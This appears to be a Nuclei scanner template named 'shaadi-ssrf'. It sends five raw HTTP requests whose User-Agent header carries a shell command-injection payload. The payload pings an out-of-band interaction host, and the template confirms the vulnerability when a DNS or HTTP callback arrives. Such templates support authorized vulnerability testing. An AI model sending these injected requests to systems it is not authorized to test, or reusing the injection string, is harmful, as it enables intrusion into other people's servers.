id: shaadi-ssrf

info:
  name: shaadi-ssrf
  author: pdteam
  severity: Critical

http:
  - raw:
      - |
        GET /?? HTTP/2
        Host: {{Hostname}}
        User-Agent: &(:;)&'\"`0&(ping -c 1 {{interactsh-url}})&`'

      - |
        GET /robots.txt HTTP/2
        Host: {{Hostname}}
        User-Agent: &(:;)&'\"`0&(ping -c 1 {{interactsh-url}})&`'

      - |
        GET /index.php HTTP/2
        Host: {{Hostname}}
        User-Agent: &(:;)&'\"`0&(ping -c 1 {{interactsh-url}})&`'

      - |
        POST /index.php HTTP/2
        Host: {{Hostname}}
        User-Agent: &(:;)&'\"`0&(ping -c 1 {{interactsh-url}})&`'

      - |
        POST // HTTP/2
        Host: {{Hostname}}
        User-Agent: &(:;)&'\"`0&(ping -c 1 {{interactsh-url}})&`'


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS or HTTP Interaction
        words:
          - "dns"
          - "http"